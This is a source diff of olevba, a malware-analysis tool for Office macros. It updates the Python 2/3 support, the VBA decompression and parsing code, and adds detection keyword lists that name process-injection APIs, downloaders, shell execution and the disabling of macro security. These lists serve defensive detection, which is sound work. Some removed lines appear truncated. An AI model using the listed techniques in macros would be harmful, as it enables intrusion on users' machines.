+ - Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
+ - PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
+ - Word/PowerPoint 2007+ XML (aka Flat OPC)
+ - Word 2003 XML (.xml)
+ - Word/Excel Single File Web Page / MHTML (.mht)
+ - Publisher (.pub)
+ - SYLK/SLK files (.slk)
+ - Text file containing VBA or VBScript source code
+ - Password-protected Zip archive containing any of the above
+ - raises an error if run with files encrypted using MS Crypto API RC4
Author: Philippe Lagadec - http://www.decalage.info
License: BSD, see source code or documentation
@@ -26,7 +32,7 @@
# === LICENSE ==================================================================
-# olevba is copyright (c) 2014-2017 Philippe Lagadec (http://www.decalage.info)
+# olevba is copyright (c) 2014-2020 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -196,9 +202,33 @@
# 2017-05-31 c1fe: - PR #135 fixing issue #132 for some Mac files
# 2017-06-08 PL: - fixed issue #122 Chr() with negative numbers
# 2017-06-15 PL: - deobfuscation line by line to handle large files
-# 2017-07-11 v0.51.1 PL: - raise exception instead of sys.exit (issue #180)
-
-__version__ = '0.51.1dev1'
+# 2017-07-11 v0.52 PL: - raise exception instead of sys.exit (issue #180)
+# 2017-11-08 VB: - PR #124 adding user form parsing (Vincent Brillault)
+# 2017-11-17 PL: - fixed a few issues with form parsing
+# 2017-11-20 PL: - fixed issue #219, do not close the file too early
+# 2017-11-24 PL: - added keywords to detect self-modifying macros and
+# attempts to disable macro security (issue #221)
+# 2018-03-19 PL: - removed pyparsing from the thirdparty subfolder
+# 2018-04-15 v0.53 PL: - added support for Word/PowerPoint 2007+ XML (FlatOPC)
+# (issue #283)
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2018-10-08 PL: - replace backspace before printing to console (issue #358)
+# 2018-10-25 CH: - detect encryption and raise error if detected
+# 2018-12-03 PL: - uses tablestream (+colors) instead of prettytable
+# 2018-12-06 PL: - colorize the suspicious keywords found in VBA code
+# 2019-01-01 PL: - removed support for Python 2.6
+# 2019-03-18 PL: - added XLM/XLF macros detection for Excel OLE files
+# 2019-03-25 CH: - added decryption of password-protected files
+# 2019-04-09 PL: - decompress_stream accepts bytes (issue #422)
+# 2019-05-23 v0.55 PL: - added option --pcode to call pcodedmp and display P-code
+# 2019-06-05 PL: - added VBA stomping detection
+# 2019-09-24 PL: - included DridexUrlDecode into olevba (issue #485)
+# 2019-12-03 PL: - added support for SLK files and XLM macros in SLK
+# 2020-01-31 v0.56 KS: - added option --no-xlm, improved MHT detection
+# 2020-03-22 PL: - uses plugin_biff to display DCONN objects and their URL
+# 2020-06-11 PL: - fixed issue #575 when decompressing raw chunks in VBA
+
+__version__ = '0.56dev6'
#------------------------------------------------------------------------------
# TODO:
@@ -223,20 +253,22 @@
# - extract_macros: use combined struct.unpack instead of many calls
# - all except clauses should target specific exceptions
-#------------------------------------------------------------------------------
+# ------------------------------------------------------------------------------
# REFERENCES:
# - [MS-OVBA]: Microsoft Office VBA File Format Structure
# http://msdn.microsoft.com/en-us/library/office/cc313094%28v=office.12%29.aspx
# - officeparser: https://github.com/unixfreak0037/officeparser
-#--- IMPORTS ------------------------------------------------------------------
+# --- IMPORTS ------------------------------------------------------------------
+import traceback
import sys
import os
import logging
import struct
-import cStringIO
+from copy import copy
+from io import BytesIO, StringIO
import math
import zipfile
import re
@@ -245,7 +277,8 @@
import base64
import zlib
import email # for MHTML parsing
-import string # for printable
+import email.feedparser
+import string # for printable
import json # for json output mode (argument --json)
# import lxml or ElementTree for XML parsing:
@@ -265,6 +298,13 @@
+ "see http://codespeak.net/lxml " \
+ "or http://effbot.org/zone/element-index.htm")
+import colorclass
+
+# On Windows, colorclass needs to be enabled:
+if os.name == 'nt':
+ colorclass.Windows.enable(auto_colors=True)
+
+
# IMPORTANT: it should be possible to run oletools directly as scripts
# in any directory without installing them with pip or setup.py.
# In that case, relative imports are NOT usable.
@@ -274,53 +314,99 @@
# print('_thismodule_dir = %r' % _thismodule_dir)
_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
# print('_parent_dir = %r' % _thirdparty_dir)
-if not _parent_dir in sys.path:
+if _parent_dir not in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty import olefile
-from oletools.thirdparty.prettytable import prettytable
+import olefile
+from oletools.thirdparty.tablestream import tablestream
from oletools.thirdparty.xglob import xglob, PathNotFoundException
-from oletools.thirdparty.pyparsing.pyparsing import \
+from pyparsing import \
CaselessKeyword, CaselessLiteral, Combine, Forward, Literal, \
Optional, QuotedString,Regex, Suppress, Word, WordStart, \
alphanums, alphas, hexnums,nums, opAssoc, srange, \
infixNotation, ParserElement
from oletools import ppt_parser
-
-
-# monkeypatch email to fix issue #32:
-# allow header lines without ":"
-import email.feedparser
-email.feedparser.headerRE = re.compile(r'^(From |[\041-\071\073-\176]{1,}:?|[\t ])')
+from oletools import oleform
+from oletools import rtfobj
+from oletools import crypto
+from oletools.common.io_encoding import ensure_stdout_handles_unicode
+from oletools.common import codepages
# === PYTHON 2+3 SUPPORT ======================================================
if sys.version_info[0] <= 2:
# Python 2.x
- if sys.version_info[1] <= 6:
- # Python 2.6
- # use is_zipfile backported from Python 2.7:
- from thirdparty.zipfile27 import is_zipfile
- else:
- # Python 2.7
- from zipfile import is_zipfile
+ PYTHON2 = True
+ # to use ord on bytes/bytearray items the same way in Python 2+3
+ # on Python 2, just use the normal ord() because items are bytes
+ byte_ord = ord
+ #: Default string encoding for the olevba API
+ DEFAULT_API_ENCODING = 'utf8' # on Python 2: UTF-8 (bytes)
else:
# Python 3.x+
- from zipfile import is_zipfile
+ PYTHON2 = False
+
+ # to use ord on bytes/bytearray items the same way in Python 2+3
+ # on Python 3, items are int, so just return the item
+ def byte_ord(x):
+ return x
# xrange is now called range:
xrange = range
+ # unichr does not exist anymore, only chr:
+ unichr = chr
+ # json2ascii also needs "unicode":
+ unicode = str
+ from functools import reduce
+ #: Default string encoding for the olevba API
+ DEFAULT_API_ENCODING = None # on Python 3: None (unicode)
+ # Python 3.0 - 3.4 support:
+ # From https://gist.github.com/ynkdir/867347/c5e188a4886bc2dd71876c7e069a7b00b6c16c61
+ if sys.version_info < (3, 5):
+ import codecs
+ _backslashreplace_errors = codecs.lookup_error("backslashreplace")
+
+ def backslashreplace_errors(exc):
+ if isinstance(exc, UnicodeDecodeError):
+ u = "".join("\\x{0:02x}".format(c) for c in exc.object[exc.start:exc.end])
+ return u, exc.end
+ return _backslashreplace_errors(exc)
+
+ codecs.register_error("backslashreplace", backslashreplace_errors)
+
+
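The `byte_ord` shim above exists because indexing `bytes` returns a 1-character `str` on Python 2 but an `int` on Python 3. A version-independent sketch of the same idea (running on Python 3, where the identity branch applies):

```python
def byte_ord(x):
    """Uniform ord() for items of bytes/bytearray across Python versions.

    On Python 3, indexing or iterating bytes yields int already, so the item
    is returned unchanged; on Python 2 (items are 1-char str) ord() applies.
    """
    if isinstance(x, int):
        return x
    return ord(x)

data = b'\x01AB'
print([byte_ord(b) for b in data])  # [1, 65, 66]
```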
+def unicode2str(unicode_string):
+ """
+ convert a unicode string to a native str:
+ - on Python 3, it returns the same string
+ - on Python 2, the string is encoded with UTF-8 to a bytes str
+ :param unicode_string: unicode string to be converted
+ :return: the string converted to str
+ :rtype: str
+ """
+ if PYTHON2:
+ return unicode_string.encode('utf8', errors='replace')
+ else:
+ return unicode_string
-# === LOGGING =================================================================
-class NullHandler(logging.Handler):
+def bytes2str(bytes_string, encoding='utf8'):
"""
- Log Handler without output, to avoid printing messages if logging is not
- configured by the main application.
- Python 2.7 has logging.NullHandler, but this is necessary for 2.6:
- see https://docs.python.org/2.6/library/logging.html#configuring-logging-for-a-library
+ convert a bytes string to a native str:
+ - on Python 2, it returns the same string (bytes=str)
+ - on Python 3, the string is decoded using the provided encoding
+ (UTF-8 by default) to a unicode str
+ :param bytes_string: bytes string to be converted
+ :param encoding: codec to be used for decoding
+ :return: the string converted to str
+ :rtype: str
"""
- def emit(self, record):
- pass
+ if PYTHON2:
+ return bytes_string
+ else:
+ return bytes_string.decode(encoding, errors='replace')
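The `unicode2str`/`bytes2str` pair converts to whatever the native `str` type is on the running interpreter. A self-contained version with a quick check (on Python 3, only the decode branch of `bytes2str` is exercised):

```python
import sys

PYTHON2 = sys.version_info[0] == 2

def bytes2str(bytes_string, encoding='utf8'):
    """Convert bytes to the native str type (decode only on Python 3)."""
    if PYTHON2:
        return bytes_string  # on Python 2, str is already bytes
    return bytes_string.decode(encoding, errors='replace')

def unicode2str(unicode_string):
    """Convert a unicode string to the native str type (encode only on Python 2)."""
    if PYTHON2:
        return unicode_string.encode('utf8', errors='replace')
    return unicode_string

print(bytes2str(b'caf\xc3\xa9'))  # 'café' on Python 3
```

Using `errors='replace'` means malformed byte sequences in malware samples degrade to replacement characters instead of raising `UnicodeDecodeError` mid-analysis.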
+
+
+# === LOGGING =================================================================
def get_logger(name, level=logging.CRITICAL+1):
"""
@@ -334,7 +420,7 @@ def get_logger(name, level=logging.CRITICAL+1):
# First, test if there is already a logger with the same name, else it
# will generate duplicate messages (due to duplicate handlers):
if name in logging.Logger.manager.loggerDict:
- #NOTE: another less intrusive but more "hackish" solution would be to
+ # NOTE: another less intrusive but more "hackish" solution would be to
# use getLogger then test if its effective level is not default.
logger = logging.getLogger(name)
# make sure level is OK:
@@ -344,7 +430,7 @@ def get_logger(name, level=logging.CRITICAL+1):
logger = logging.getLogger(name)
# only add a NullHandler for this logger, it is up to the application
# to configure its own logging:
- logger.addHandler(NullHandler())
+ logger.addHandler(logging.NullHandler())
logger.setLevel(level)
return logger
@@ -361,6 +447,7 @@ def enable_logging():
log.setLevel(logging.NOTSET)
# Also enable logging in the ppt_parser module:
ppt_parser.enable_logging()
+ crypto.enable_logging()
@@ -449,6 +536,7 @@ def __init__(self, stream_path, variable, expected, value):
RETURN_PARSE_ERROR = 6
RETURN_SEVERAL_ERRS = 7
RETURN_UNEXPECTED = 8
+RETURN_ENCRYPTED = 9
# MAC codepages (from http://stackoverflow.com/questions/1592925/decoding-mac-os-text-in-python)
MAC_CODEPAGES = {
@@ -473,19 +561,23 @@ def __init__(self, stream_path, variable, expected, value):
# Container types:
TYPE_OLE = 'OLE'
TYPE_OpenXML = 'OpenXML'
+TYPE_FlatOPC_XML = 'FlatOPC_XML'
TYPE_Word2003_XML = 'Word2003_XML'
TYPE_MHTML = 'MHTML'
TYPE_TEXT = 'Text'
TYPE_PPT = 'PPT'
+TYPE_SLK = 'SLK'
# short tag to display file types in triage mode:
TYPE2TAG = {
TYPE_OLE: 'OLE:',
TYPE_OpenXML: 'OpX:',
+ TYPE_FlatOPC_XML: 'FlX:',
TYPE_Word2003_XML: 'XML:',
TYPE_MHTML: 'MHT:',
TYPE_TEXT: 'TXT:',
- TYPE_PPT: 'PPT',
+ TYPE_PPT: 'PPT:',
+ TYPE_SLK: 'SLK:',
}
@@ -502,7 +594,20 @@ def __init__(self, stream_path, variable, expected, value):
TAG_BINDATA = NS_W + 'binData'
ATTR_NAME = NS_W + 'name'
+# Namespaces and tags for Word/PowerPoint 2007+ XML parsing:
+# root: <pkg:package>
+NS_XMLPACKAGE = '{http://schemas.microsoft.com/office/2006/xmlPackage}'
+TAG_PACKAGE = NS_XMLPACKAGE + 'package'
+# the tag <pkg:part> includes <pkg:binaryData> that contains the VBA macro code in Base64:
+# <pkg:part pkg:name="/word/vbaProject.bin" pkg:contentType="application/vnd.ms-office.vbaProject">
+TAG_PKGPART = NS_XMLPACKAGE + 'part'
+ATTR_PKG_NAME = NS_XMLPACKAGE + 'name'
+ATTR_PKG_CONTENTTYPE = NS_XMLPACKAGE + 'contentType'
+CTYPE_VBAPROJECT = "application/vnd.ms-office.vbaProject"
+TAG_PKGBINDATA = NS_XMLPACKAGE + 'binaryData'
+
# Keywords to detect auto-executable macros
+# Simple strings, without regex characters:
AUTOEXEC_KEYWORDS = {
# MS Word:
'Runs when the Word document is opened':
@@ -522,16 +627,27 @@ def __init__(self, stream_path, variable, expected, value):
# MS Excel:
'Runs when the Excel Workbook is opened':
- ('Auto_Open', 'Workbook_Open', 'Workbook_Activate'),
+ ('Auto_Open', 'Workbook_Open', 'Workbook_Activate', 'Auto_Ope'),
+ # TODO: "Auto_Ope" is temporarily here because of a bug in plugin_biff, which misses the last byte in "Auto_Open"...
'Runs when the Excel Workbook is closed':
('Auto_Close', 'Workbook_Close'),
+}
+# Keywords to detect auto-executable macros
+# Regular expressions:
+AUTOEXEC_KEYWORDS_REGEX = {
# any MS Office application:
'Runs when the file is opened (using InkPicture ActiveX object)':
# ref:https://twitter.com/joe4security/status/770691099988025345
- (r'\w+_Painted',),
+ (r'\w+_Painted', r'\w+_Painting'),
'Runs when the file is opened and ActiveX objects trigger events':
- (r'\w+_(?:GotFocus|LostFocus|MouseHover)',),
+ (r'\w+_GotFocus', r'\w+_LostFocus', r'\w+_MouseHover', r'\w+_Click',
+ r'\w+_Change', r'\w+_Resize', r'\w+_BeforeNavigate2', r'\w+_BeforeScriptExecute',
+ r'\w+_DocumentComplete', r'\w+_DownloadBegin', r'\w+_DownloadComplete',
+ r'\w+_FileDownload', r'\w+_NavigateComplete2', r'\w+_NavigateError',
+ r'\w+_ProgressChange', r'\w+_PropertyChange', r'\w+_SetSecureLockIcon',
+ r'\w+_StatusTextChange', r'\w+_TitleChange', r'\w+_MouseMove', r'\w+_MouseEnter',
+ r'\w+_MouseLeave', r'\w+_Layout', r'\w+_OnConnecting'),
}
# Suspicious Keywords that may be used by malware
@@ -558,14 +674,13 @@ def __init__(self, stream_path, variable, expected, value):
('CreateTextFile', 'ADODB.Stream', 'WriteText', 'SaveToFile'),
#CreateTextFile: http://msdn.microsoft.com/en-us/library/office/gg264617%28v=office.15%29.aspx
#ADODB.Stream sample: http://pastebin.com/Z4TMyuq6
+ # ShellExecute: https://twitter.com/StanHacked/status/1075088449768693762
'May run an executable file or a system command':
('Shell', 'vbNormal', 'vbNormalFocus', 'vbHide', 'vbMinimizedFocus', 'vbMaximizedFocus', 'vbNormalNoFocus',
- 'vbMinimizedNoFocus', 'WScript.Shell', 'Run', 'ShellExecute'),
+ 'vbMinimizedNoFocus', 'WScript.Shell', 'Run', 'ShellExecute', 'ShellExecuteA', 'shell32'),
# MacScript: see https://msdn.microsoft.com/en-us/library/office/gg264812.aspx
'May run an executable file or a system command on a Mac':
('MacScript',),
- 'May run an executable file or a system command on a Mac (if combined with libc.dylib)':
- ('system', 'popen', r'exec[lv][ep]?'),
#Shell: http://msdn.microsoft.com/en-us/library/office/gg278437%28v=office.15%29.aspx
#WScript.Shell+Run sample: http://pastebin.com/Z4TMyuq6
'May run PowerShell commands':
@@ -578,6 +693,10 @@ def __init__(self, stream_path, variable, expected, value):
'invoke-command', 'scriptblock', 'Invoke-Expression', 'AuthorizationManager'),
'May run an executable file or a system command using PowerShell':
('Start-Process',),
+ 'May run an executable file or a system command using Excel 4 Macros (XLM/XLF)':
+ ('EXEC',),
+ 'May call a DLL using Excel 4 Macros (XLM/XLF)':
+ ('REGISTER', 'CALL'),
'May hide the application':
('Application.Visible', 'ShowWindow', 'SW_HIDE'),
'May create a directory':
@@ -593,6 +712,8 @@ def __init__(self, stream_path, variable, expected, value):
('New-Object',),
'May run an application (if combined with CreateObject)':
('Shell.Application',),
+ 'May run an Excel 4 Macro (aka XLM/XLF) from VBA':
+ ('ExecuteExcel4Macro',),
'May enumerate application windows (if combined with Shell.Application object)':
('Windows', 'FindWindow'),
'May run code from a DLL':
@@ -601,13 +722,16 @@ def __init__(self, stream_path, variable, expected, value):
'May run code from a library on a Mac':
#TODO: regex to find declare+lib on same line - see mraptor
('libc.dylib', 'dylib'),
+ 'May run code from a DLL using Excel 4 Macros (XLM/XLF)':
+ ('REGISTER',),
'May inject code into another process':
- ('CreateThread', 'VirtualAlloc', # (issue #9) suggested by Davy Douhine - used by MSF payload
- 'VirtualAllocEx', 'RtlMoveMemory',
+ ('CreateThread', 'CreateUserThread', 'VirtualAlloc', # (issue #9) suggested by Davy Douhine - used by MSF payload
+ 'VirtualAllocEx', 'RtlMoveMemory', 'WriteProcessMemory',
+ 'SetContextThread', 'QueueApcThread', 'WriteVirtualMemory', 'VirtualProtect',
),
'May run a shellcode in memory':
- ('EnumSystemLanguageGroupsW?', # Used by Hancitor in Oct 2016
- 'EnumDateFormats(?:W|(?:Ex){1,2})?'), # see https://msdn.microsoft.com/en-us/library/windows/desktop/dd317810(v=vs.85).aspx
+ ('SetTimer', # Vidar sample: https://app.any.run/tasks/897f28e7-3162-4b65-b268-2655543199d6/
+ ),
'May download files from the Internet':
#TODO: regex to find urlmon+URLDownloadToFileA on same line
('URLDownloadToFileA', 'Msxml2.XMLHTTP', 'Microsoft.XMLHTTP',
@@ -662,6 +786,34 @@ def __init__(self, stream_path, variable, expected, value):
'May detect WinJail Sandbox':
# ref: http://www.cplusplus.com/forum/windows/96874/
('Afx:400000:0',),
+ 'May attempt to disable VBA macro security and Protected View':
+ # ref: http://blog.trendmicro.com/trendlabs-security-intelligence/qkg-filecoder-self-replicating-document-encrypting-ransomware/
+ # ref: https://thehackernews.com/2017/11/ms-office-macro-malware.html
+ ('AccessVBOM', 'VBAWarnings', 'ProtectedView', 'DisableAttachementsInPV', 'DisableInternetFilesInPV',
+ 'DisableUnsafeLocationsInPV', 'blockcontentexecutionfrominternet'),
+ 'May attempt to modify the VBA code (self-modification)':
+ ('VBProject', 'VBComponents', 'CodeModule', 'AddFromString'),
+ 'May modify Excel 4 Macro formulas at runtime (XLM/XLF)':
+ ('FORMULA.FILL',),
+}
+
+# Suspicious Keywords to be searched for directly as regex, without escaping
+SUSPICIOUS_KEYWORDS_REGEX = {
+ 'May use Word Document Variables to store and hide data':
+ (r'\.\s*Variables',), # '.Variables' with optional whitespaces after the dot
+ # Vidar sample: https://app.any.run/tasks/897f28e7-3162-4b65-b268-2655543199d6/
+ 'May run a shellcode in memory':
+ (r'EnumSystemLanguageGroupsW?', # Used by Hancitor in Oct 2016
+ r'EnumDateFormats(?:W|(?:Ex){1,2})?', # see https://msdn.microsoft.com/en-us/library/windows/desktop/dd317810(v=vs.85).aspx
+ ),
+ 'May run an executable file or a system command on a Mac (if combined with libc.dylib)':
+ ('system', 'popen', r'exec[lv][ep]?'),
+}
+
+# Suspicious Keywords to be searched for directly as strings, without regex
+SUSPICIOUS_KEYWORDS_NOREGEX = {
+ 'May use special characters such as backspace to obfuscate code when printed on the console':
+ ('\b',),
}
# Regular Expression for a URL:
@@ -713,7 +865,8 @@ def __init__(self, stream_path, variable, expected, value):
BASE64_RE = r'(?:[A-Za-z0-9+/]{4}){1,}(?:[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==)?'
re_base64_string = re.compile('"' + BASE64_RE + '"')
# white list of common strings matching the base64 regex, but which are not base64 strings (all lowercase):
-BASE64_WHITELIST = set(['thisdocument', 'thisworkbook', 'test', 'temp', 'http', 'open', 'exit'])
+BASE64_WHITELIST = set(['thisdocument', 'thisworkbook', 'test', 'temp', 'http', 'open', 'exit', 'kernel32',
+ 'virtualalloc', 'createthread'])
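The Base64 regex and its whitelist work together: the regex finds quoted strings that look like Base64, and the whitelist drops common identifiers that match the pattern by coincidence. A minimal sketch of that filtering (using the pre-extension whitelist; `find_base64_strings` is a hypothetical helper name):

```python
import re

BASE64_RE = r'(?:[A-Za-z0-9+/]{4}){1,}(?:[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==)?'
re_base64_string = re.compile('"' + BASE64_RE + '"')
BASE64_WHITELIST = set(['thisdocument', 'thisworkbook', 'test', 'temp', 'http', 'open', 'exit'])

def find_base64_strings(vba_code):
    """Return quoted Base64-looking strings, minus whitelisted false positives."""
    found = []
    for match in re_base64_string.finditer(vba_code):
        value = match.group().strip('"')
        if value.lower() not in BASE64_WHITELIST:
            found.append(value)
    return found

print(find_base64_strings('x = "U29tZSBkYXRh" : y = "test"'))  # ['U29tZSBkYXRh']
```

The diff's additions ('kernel32', 'virtualalloc', 'createthread') extend the whitelist because those API names are short, alphanumeric, and a multiple of 4 characters, so they match the Base64 pattern despite not being encoded data.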
# regex to detect strings encoded with a specific Dridex algorithm
# (see https://github.com/JamesHabben/MalwareStuff)
@@ -722,7 +875,8 @@ def __init__(self, stream_path, variable, expected, value):
re_nothex_check = re.compile(r'[G-Zg-z]')
# regex to extract printable strings (at least 5 chars) from VBA Forms:
-re_printable_string = re.compile(r'[\t\r\n\x20-\xFF]{5,}')
+# (must be bytes for Python 3)
+re_printable_string = re.compile(b'[\\t\\r\\n\\x20-\\xFF]{5,}')
# === PARTIAL VBA GRAMMAR ====================================================
@@ -863,10 +1017,13 @@ class VbaExpressionString(str):
def vba_chr_tostr(t):
try:
i = t[0]
- # normal, non-unicode character:
if i>=0 and i<=255:
+ # normal, non-unicode character:
+ # TODO: check if it needs to be converted to bytes for Python 3
return VbaExpressionString(chr(i))
else:
+ # unicode character
+ # Note: this distinction is only needed for Python 2
return VbaExpressionString(unichr(i).encode('utf-8', 'backslashreplace'))
except ValueError:
log.exception('ERROR: incorrect parameter value for chr(): %r' % i)
@@ -1133,8 +1290,9 @@ def decompress_stream(compressed_container):
"""
Decompress a stream according to MS-OVBA section 2.4.1
- compressed_container: string compressed according to the MS-OVBA 2.4.1.3.6 Compression algorithm
- return the decompressed container as a string (bytes)
+ :param compressed_container bytearray: bytearray or bytes compressed according to the MS-OVBA 2.4.1.3.6 Compression algorithm
+ :return: the decompressed container as a bytes string
+ :rtype: bytes
"""
# 2.4.1.2 State Variables
@@ -1156,10 +1314,14 @@ def decompress_stream(compressed_container):
# DecompressedChunkStart: The location of the first byte of the DecompressedChunk (section 2.4.1.1.3) within the
# DecompressedBuffer (section 2.4.1.1.2).
- decompressed_container = '' # result
+ # Check the input is a bytearray, otherwise convert it (assuming it's bytes):
+ if not isinstance(compressed_container, bytearray):
+ compressed_container = bytearray(compressed_container)
+ # raise TypeError('decompress_stream requires a bytearray as input')
+ decompressed_container = bytearray() # result
compressed_current = 0
- sig_byte = ord(compressed_container[compressed_current])
+ sig_byte = compressed_container[compressed_current]
if sig_byte != 0x01:
raise ValueError('invalid signature byte {0:02X}'.format(sig_byte))
@@ -1205,7 +1367,7 @@ def decompress_stream(compressed_container):
# MS-OVBA 2.4.1.3.3 Decompressing a RawChunk
# uncompressed chunk: read the next 4096 bytes as-is
#TODO: check if there are at least 4096 bytes left
- decompressed_container += compressed_container[compressed_current:compressed_current + 4096]
+ decompressed_container.extend(compressed_container[compressed_current:compressed_current + 4096])
compressed_current += 4096
else:
# MS-OVBA 2.4.1.3.2 Decompressing a CompressedChunk
@@ -1216,7 +1378,7 @@ def decompress_stream(compressed_container):
# log.debug('compressed_current = %d / compressed_end = %d' % (compressed_current, compressed_end))
# FlagByte: 8 bits indicating if the following 8 tokens are either literal (1 byte of plain text) or
# copy tokens (reference to a previous literal token)
- flag_byte = ord(compressed_container[compressed_current])
+ flag_byte = compressed_container[compressed_current]
compressed_current += 1
for bit_index in xrange(0, 8):
# log.debug('bit_index=%d / compressed_current=%d / compressed_end=%d' % (bit_index, compressed_current, compressed_end))
@@ -1228,7 +1390,7 @@ def decompress_stream(compressed_container):
#log.debug('bit_index=%d: flag_bit=%d' % (bit_index, flag_bit))
if flag_bit == 0: # LiteralToken
# copy one byte directly to output
- decompressed_container += compressed_container[compressed_current]
+ decompressed_container.extend([compressed_container[compressed_current]])
compressed_current += 1
else: # CopyToken
# MS-OVBA 2.4.1.3.19.2 Unpack CopyToken
@@ -1244,520 +1406,664 @@ def decompress_stream(compressed_container):
#log.debug('offset=%d length=%d' % (offset, length))
copy_source = len(decompressed_container) - offset
for index in xrange(copy_source, copy_source + length):
- decompressed_container += decompressed_container[index]
+ decompressed_container.extend([decompressed_container[index]])
compressed_current += 2
- return decompressed_container
+ return bytes(decompressed_container)
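The switch from string concatenation to a `bytearray` matters most in the CopyToken branch, where bytes are appended one at a time so that overlapping copies work. A sketch of just that step, assuming a standalone helper (`copy_token_expand` is not olevba's API):

```python
def copy_token_expand(decompressed, offset, length):
    """Expand one CopyToken: append `length` bytes copied from `offset` bytes
    back in the buffer, one byte at a time (as in MS-OVBA 2.4.1.3.19.2).

    Byte-by-byte copying is what makes overlapping copies (offset < length)
    behave like LZ77 run expansion: freshly appended bytes become the source
    for later iterations of the same token.
    """
    copy_source = len(decompressed) - offset
    for index in range(copy_source, copy_source + length):
        decompressed.extend([decompressed[index]])
    return decompressed

buf = bytearray(b'ab')
copy_token_expand(buf, 2, 6)  # copy 6 bytes starting 2 bytes back
print(bytes(buf))  # b'abababab'
```

A bulk slice copy would fail here: at the start of the token only 2 source bytes exist, yet 6 are produced, because the loop reads bytes it has just written.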
-def _extract_vba(ole, vba_root, project_path, dir_path, relaxed=False):
+class VBA_Module(object):
"""
- Extract VBA macros from an OleFileIO object.
- Internal function, do not call directly.
-
- vba_root: path to the VBA root storage, containing the VBA storage and the PROJECT stream
- vba_project: path to the PROJECT stream
- :param relaxed: If True, only create info/debug log entry if data is not as expected
- (e.g. opening substream fails); if False, raise an error in this case
- This is a generator, yielding (stream path, VBA filename, VBA source code) for each VBA code stream
+ Class to parse a VBA module from an OLE file, and to store all the corresponding
+ metadata and VBA source code.
"""
- # Open the PROJECT stream:
- project = ole.openstream(project_path)
- log.debug('relaxed is %s' % relaxed)
- # sample content of the PROJECT stream:
-
- ## ID="{5312AC8A-349D-4950-BDD0-49BE3C4DD0F0}"
- ## Document=ThisDocument/&H00000000
- ## Module=NewMacros
- ## Name="Project"
- ## HelpContextID="0"
- ## VersionCompatible32="393222000"
- ## CMG="F1F301E705E705E705E705"
- ## DPB="8F8D7FE3831F2020202020"
- ## GC="2D2FDD81E51EE61EE6E1"
- ##
- ## [Host Extender Info]
- ## &H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
- ## &H00000002={000209F2-0000-0000-C000-000000000046};Word8.0;&H00000000
- ##
- ## [Workspace]
- ## ThisDocument=22, 29, 339, 477, Z
- ## NewMacros=-4, 42, 832, 510, C
-
- code_modules = {}
-
- for line in project:
- line = line.strip()
- if '=' in line:
- # split line at the 1st equal sign:
- name, value = line.split('=', 1)
- # looking for code modules
- # add the code module as a key in the dictionary
- # the value will be the extension needed later
- # The value is converted to lowercase, to allow case-insensitive matching (issue #3)
- value = value.lower()
- if name == 'Document':
- # split value at the 1st slash, keep 1st part:
- value = value.split('/', 1)[0]
- code_modules[value] = CLASS_EXTENSION
- elif name == 'Module':
- code_modules[value] = MODULE_EXTENSION
- elif name == 'Class':
- code_modules[value] = CLASS_EXTENSION
- elif name == 'BaseClass':
- code_modules[value] = FORM_EXTENSION
-
- # read data from dir stream (compressed)
- dir_compressed = ole.openstream(dir_path).read()
-
- def check_value(name, expected, value):
- if expected != value:
- if relaxed:
- log.error("invalid value for {0} expected {1:04X} got {2:04X}"
- .format(name, expected, value))
- else:
- raise UnexpectedDataError(dir_path, name, expected, value)
-
- dir_stream = cStringIO.StringIO(decompress_stream(dir_compressed))
-
- # PROJECTSYSKIND Record
- projectsyskind_id = struct.unpack(" 128:
- log.error("PROJECTNAME_SizeOfProjectName value not in range: {0}".format(projectname_sizeof_projectname))
- projectname_projectname = dir_stream.read(projectname_sizeof_projectname)
- unused = projectname_projectname
-
- # PROJECTDOCSTRING Record
- projectdocstring_id = struct.unpack(" 2000:
- log.error(
- "PROJECTDOCSTRING_SizeOfDocString value not in range: {0}".format(projectdocstring_sizeof_docstring))
- projectdocstring_docstring = dir_stream.read(projectdocstring_sizeof_docstring)
- projectdocstring_reserved = struct.unpack(" 260:
- log.error(
- "PROJECTHELPFILEPATH_SizeOfHelpFile1 value not in range: {0}".format(projecthelpfilepath_sizeof_helpfile1))
- projecthelpfilepath_helpfile1 = dir_stream.read(projecthelpfilepath_sizeof_helpfile1)
- projecthelpfilepath_reserved = struct.unpack(" 1015:
- log.error(
- "PROJECTCONSTANTS_SizeOfConstants value not in range: {0}".format(projectconstants_sizeof_constants))
- projectconstants_constants = dir_stream.read(projectconstants_sizeof_constants)
- projectconstants_reserved = struct.unpack(" 0:
- code_data = decompress_stream(code_data)
+ code_data = decompress_stream(bytearray(code_data))
+ # store the raw code encoded as bytes with the project's code page:
+ self.code_raw = code_data
+ # decode it to unicode:
+ self.code = project.decode_bytes(code_data)
+ # also store a native str version:
+ self.code_str = unicode2str(self.code)
# case-insensitive search in the code_modules dict to find the file extension:
- filext = code_modules.get(modulename_modulename.lower(), 'bin')
- filename = '{0}.{1}'.format(modulename_modulename, filext)
- #TODO: also yield the codepage so that callers can decode it properly
- yield (code_path, filename, code_data)
- # print '-'*79
- # print filename
- # print ''
- # print code_data
- # print ''
- log.debug('extracted file {0}'.format(filename))
+ filext = self.project.module_ext.get(self.name.lower(), 'vba')
+ self.filename = u'{0}.{1}'.format(self.name, filext)
+ self.filename_str = unicode2str(self.filename)
+ log.debug('extracted file {0}'.format(self.filename_str))
else:
- log.warning("module stream {0} has code data length 0".format(modulestreamname_streamname))
+ log.warning("module stream {0} has code data length 0".format(self.streamname_str))
except (UnexpectedDataError, SubstreamOpenError):
raise
except Exception as exc:
- log.info('Error parsing module {0} of {1} in _extract_vba:'
- .format(projectmodule_index, projectmodules_count),
+ log.info('Error parsing module {0} of {1}:'
+ .format(module_index, project.modules_count),
exc_info=True)
- if not relaxed:
+ if not project.relaxed:
raise
- _ = unused # make pylint happy: now variable "unused" is being used ;-)
- return
+
+
+class VBA_Project(object):
+ """
+ Class to parse a VBA project from an OLE file, and to store all the corresponding
+ metadata and VBA modules.
+ """
+
